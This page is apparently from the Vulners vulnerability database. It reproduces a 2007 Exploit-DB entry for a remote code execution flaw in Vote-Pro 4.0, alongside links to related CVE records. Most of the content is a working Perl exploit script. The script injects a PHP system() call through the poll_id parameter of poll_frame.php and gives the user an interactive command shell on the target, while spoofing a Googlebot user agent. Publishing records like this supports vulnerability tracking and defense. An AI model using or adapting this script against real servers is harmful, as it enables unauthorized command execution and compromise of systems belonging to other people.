Lucene search
+L

Vote-Pro 4.0 - 'poll_frame.php?poll_id' Remote Code Execution

🗓️ 23 Jan 2007 00:00:00Reported by r0ut3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Vote-Pro 4.0 poll_frame.php Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-0504
26 Jan 200700:00
cve
cve
CVE
CVE-2007-0535
26 Jan 200701:00
cve
cvelist
Cvelist
CVE-2007-0504
26 Jan 200700:00
cvelist
cvelist
Cvelist
CVE-2007-0535
26 Jan 200701:00
cvelist
euvd
EUVD
EUVD-2007-0502
26 Jan 200700:00
euvd
euvd
EUVD
EUVD-2007-0533
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0504
26 Jan 200700:28
nvd
nvd
NVD
CVE-2007-0535
26 Jan 200701:28
nvd
prion
Prion
Sql injection
26 Jan 200700:28
prion
prion
Prion
Sql injection
26 Jan 200701:28
prion
Rows per page
#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          Vote-Pro Code Injection 0day Exploit                                 #
#################################################################################################
# Software: Vote-Pro 4.0                                                                        #
#                                                                                               #
# Vendor: http://www.vote-pro.com/                                                              #
#                                                                                               #
# Released: 2007/01/23                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for Vote-Pro administrator                 #
# testing purposes only!                                                                        #
#################################################################################################

use IO::Socket;

$port = "80"; # connection port
$target = shift; # vote-pro.com
$folder = shift; # /votepro/

sub Header()
{
	print q
	{Vote-Pro Code Injection Exploit - writ3r [at] gmail.com
-------------------------------------------------------
};
}

sub Usage()
{
	print q
	{
Usage: votecmd.pl [target] [directory]
Example: votecmd.pl vote-pro.com /votepro/
};
	exit();
}

Header();

if (!$target || !$folder) {
	Usage(); }

print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ "exit")
{
	$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
	print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";
	print $xpack "Host: $target\n";
	print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
	print $xpack "Accept: text/html\n";
	print $xpack "Connection: keep-alive\n\n";

	print "[cmd]\$ ";
	$cmd = <STDIN>;
	$cmd =~ s/ /%20/g;
}

print "[!] Connection to host lost...\n";

# milw0rm.com [2007-01-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.06177
42